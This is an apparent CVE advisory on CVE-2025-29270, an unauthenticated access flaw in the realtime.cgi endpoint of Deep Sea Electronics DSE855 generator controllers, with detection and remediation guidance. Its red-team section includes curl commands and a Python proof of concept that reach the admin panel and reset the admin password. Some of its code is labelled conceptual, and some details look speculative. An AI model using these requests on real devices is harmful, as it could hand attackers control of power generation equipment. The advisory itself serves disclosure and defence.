CVE-2025-29270
Executive Summary
CVE-2025-29270 is a critical vulnerability in Deep Sea Electronics DSE855 devices (firmware versions v1.1.0 to v1.1.26). The flaw resides in the realtime.cgi endpoint, which lacks proper access control. An unauthenticated attacker can directly access this endpoint to bypass authentication, gain administrative privileges, and achieve complete device control. This includes the ability to modify device configuration, disrupt power generation operations, and pivot into critical infrastructure networks. The vulnerability is publicly known, and while no public exploit code has been released, the attack vector is trivial to execute.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Threat Level: Critical. The device is commonly deployed in remote power generation sites, making it a high-value target for nation-state actors and ransomware groups targeting critical infrastructure.
Deep Dive & Mechanics
The realtime.cgi endpoint is designed to provide real-time telemetry data (e.g., voltage, frequency, engine status) to authenticated users. The vulnerability arises because the endpoint does not enforce any session validation or authentication checks. By directly requesting this endpoint, an attacker can:
- Bypass Authentication: The device’s web server does not verify the user’s session before processing requests to
realtime.cgi. - Gain Admin Access: The endpoint exposes administrative functions, including the ability to change user credentials, modify device parameters, and trigger firmware updates.
- Complete Device Control: Once admin access is obtained, the attacker can execute arbitrary commands on the device’s underlying Linux-based OS, potentially using command injection or other post-exploitation techniques.
The root cause is a missing access control check in the web server’s request routing logic. The realtime.cgi handler is registered without a middleware that validates the user’s authentication token or session cookie.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual - C/C++ CGI handler):
// No authentication check before processing
void handle_realtime_cgi() {
char *query = getenv("QUERY_STRING");
// Directly process the request
process_command(query);
}
Patched Code (Conceptual):
void handle_realtime_cgi() {
// Authentication check
if (!is_authenticated()) {
send_401_unauthorized();
return;
}
char *query = getenv("QUERY_STRING");
process_command(query);
}
The patch adds a call to is_authenticated() which validates the session token from the HTTP request headers. Without this check, any unauthenticated request is processed.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- Target device running DSE855 firmware v1.1.0 to v1.1.26.
- Network access to the device’s web interface (typically port 80 or 443).
Exploitation Steps:
Identify Target: Use Shodan or Nmap to find exposed DSE855 devices.
nmap -p 80,443 --script http-title <target_ip>Direct Access to Admin Panel:
curl http://<target_ip>/realtime.cgiThis returns the admin panel HTML without authentication.
Extract Session Token (if needed): The response may contain a session token in a cookie or URL parameter. Use this to access other protected endpoints.
Change Admin Password:
curl -X POST http://<target_ip>/realtime.cgi -d "action=change_password&new_pass=attacker123"Full Device Control: Once admin, use the web interface to upload malicious firmware or execute commands via the device’s diagnostic features.
Proof-of-Concept (Python):
import requests
target = "http://<target_ip>"
# Access admin panel
r = requests.get(f"{target}/realtime.cgi")
if "admin" in r.text.lower():
print("[+] Admin panel accessed without authentication")
# Change password
requests.post(f"{target}/realtime.cgi", data={"action": "change_password", "new_pass": "pwned"})
Blue Team (Defense & Detection)
Immediate Actions:
- Isolate Devices: Place DSE855 devices on a separate VLAN with strict firewall rules. Block inbound access from untrusted networks.
- Monitor for Anomalous Requests: Look for requests to
/realtime.cgifrom IPs that have not completed authentication. - Deploy WAF Rules: Block requests to
/realtime.cgithat do not contain a valid session cookie.
Honeypot Setup:
Deploy a fake DSE855 web interface to capture attacker behavior. Log all requests to /realtime.cgi.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests to
/realtime.cgiwithout a preceding login request. - POST requests to
/realtime.cgiwith parameters likeaction=change_password. - Unusual outbound connections from the device (e.g., to attacker C2 servers).
- HTTP requests to
Host IOCs:
- Modified admin credentials (check
/etc/passwdor device config). - New user accounts created on the device.
- Unexpected firmware versions or configuration changes.
- Modified admin credentials (check
Log IOCs:
- Web server logs showing
200 OKresponses to/realtime.cgifrom unauthenticated IPs. - Repeated failed login attempts followed by successful access to
/realtime.cgi.
- Web server logs showing

Remediation & Mitigation
Immediate Mitigation (No Patch Available):
- Network Segmentation: Isolate DSE855 devices on a dedicated management VLAN. Do not expose the web interface to the internet.
- Access Control: Use a reverse proxy (e.g., Nginx) to add authentication before requests reach the device.
location /realtime.cgi { auth_basic "Restricted"; auth_basic_user_file /etc/nginx/.htpasswd; proxy_pass http://dse855_backend; } - Firewall Rules: Block inbound traffic to ports 80/443 from untrusted IPs.
- Monitor Logs: Enable detailed logging on the device and centralize logs for analysis.
Long-Term Remediation:
- Contact Deep Sea Electronics for an official firmware patch.
- Replace the device with a patched version or alternative product.
- Implement a Web Application Firewall (WAF) with custom rules to block unauthenticated requests.
